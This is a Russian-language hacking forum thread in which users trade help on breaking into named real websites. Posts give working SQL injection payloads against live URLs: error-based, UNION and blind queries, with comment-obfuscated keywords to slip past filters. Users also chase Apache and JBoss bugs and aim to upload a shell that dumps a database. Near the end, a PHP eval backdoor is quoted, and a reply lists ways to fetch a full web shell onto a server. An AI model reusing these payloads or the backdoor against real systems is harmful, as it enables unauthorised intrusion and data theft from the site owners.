да вот даже не знаю где можно пример найти, там самописный двиг. стоит на mssql - это 100%. в принципе хотелось бы как-нибудь вставить кавычку, она судя по всему и нужна для успешной инъекции.. только трабл, как я писал - она фильтруется. какие ещё способы ? вот тут вот _http://www.xakep.ru/post/43124/ описывается как ломать mssql. пункт: очень странный. он в таком случае юзает просто без кавычек инжу ) что в моём случае не тянет..
Да, я ошибся. Инъекцию легко провести в таком случае как у тебя вот так. eyvasaaaa.com/getinfo/user/13'%20or%201=@@version-- Но так как у тебя кавычка фильтруется, то сделать это будет сложней или вообще невозможно. Для начала нужно определить каким-либо образом действительно ли в скрипте идет перевод спецсимволов в сущности(аналог htmlspecialchars() в php)...
http://www.biowoodenergy.com/newsletter.php POST [email protected]&energy%5b%5d= ' не поддаётся , кому не сложно посмотрите есть ли там вообще дыра спс
подскажите пожалуйста http://www.cwars.ru/lib/index.php?r=' это Sql уязвимость? пытаюсь определить количество полей, нечего не получается.
помгите кто знает Недавно при сканирование одного сервиса через Acunetix Web Vulnerability Scanner 7 нашол следующию дырдочку а вот теперь как сней дальше быть ненаю Сами дырдачки Security fixes in Apache version 1.3.39: CVE-2006-5752 (cve.mitre.org) mod_status: Fix a possible XSS attack against a site with a public server-status page and ExtendedStatus enabled, for browsers which perform charset "detection". Reported by Stefan Esser. [Joe Orton] CVE-2007-3304 (cve.mitre.org) Ensure that the parent process cannot be forced to kill non-child processes by checking scoreboard PID data with parent process privately stored PID data. если не сложно и можно подскажите что дальше и где достать сам скрипт и exploit и вобще возможна ли атака sql Inj спасибо!!!
Понятное дело что щас её там нет но дырдачка в самом апаче если его обойти и залить намеренно файл который будит дампить бд это возможно и что для этого надо
http://www.cwars.ru/lib/index.php?r='+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1+--+
интересует вот этот баг JBoss HttpAdaptor JMXInvokerServlet если можно назват багом нашел док про нему но пока что английский хромает)) http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf если кто знает норм подробную описание был бы благодарен
Нашел какую то нестандартную скулю, ну или или ее подобие на нужном мне сайте. http://www.bading.com/index.php?option=com_fireboard&Itemid=33&func=view&catid=2&id=667 После того как подставляю ' к func=view, сообщения ниже пропадают. Но если уберу &catid=2&id=667 сообщений и так не будет. Подскажите пожалуйста, как с ней работать и скуля ли это вообще? Добавлено через время И ещё вот есть скуля, но вот в чем проблема пока что не понял. Не могу подобрать количество столбцов. http://www.boatquotes.com/marine-surveys.php?catid=5
http://www.boatquotes.com/marine-surveys.php?catid=5/**/uNiOn/**/SeLeCt/**/1--+ Не могу понять логики запроса... Может кто сможет далее раскрутить. Ну или можно крутить, как блайнд: http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=5--+ (true) http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/substring(version(),1,1)=4--+ (false) Попробуй сделать вывод в ошибку.
http://www.boatquotes.com/marine-surveys.php?catid=5/**/and/**/row(1,2)in(select/**/count(*),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x3a,floor(rand(0)*2))as/**/a/**/from/**/information_schema.tables/**/x/**/group/**/by/**/a)
Konqi , что можно почитать по этому вопросу, дай ссылки, особенно интересует подстановка row(1,2) в запрос.
Всем доброго время суток нашол есчё кое что на том же портале где и писал высше про уязвимость в апаче при запросе сервер выдаёт 500 ошибочку /mess?uidc=%5B%USER_CLICKCODE%%5D'&mid=%5B%MESS_ID%%5D'&url=980852' кто реально может помочь пишите в личку дам полный линк а ситуация такая когда начинаю раскручивать начинает просто выкидывать на главную страницу или выдавать 404 ошибочку 2 сутки бьюсь хелп люди
А в чем проблема, что 404 или выкидывает? 1) Может быть WAF. 2) Если идет инклюд или открытие файла, а ты вставляешь кавычку или из-за кавычки SQL-запрос становиться неверным, то перекидывать на главную страницу. Там может быть и нету иньекции, с чего ты взял что она есть? о_0 Ну или попробуй вместо кавычки подставить верный SQL-запрос (and 1=1), и неверный (and 1=2) если при первом не перекинуло на главную, а на 2ом перекинуло, то SQL-inject есть. Удачи.
какие еще команды есть напободие wget? <?php if (!empty($_POST['e'])) @eval(base64_decode($_POST['e'])); ?> можно ли этой командой залить полноценный шелл? можно примерчик?
качай курлом и записывай в файл UPD: зачем ты юзаеш этот бекдор если не знаеш что оно делает? вариантов море, eval()+file_get_contents(), copy(),wget, sockets, php_curl, system_curl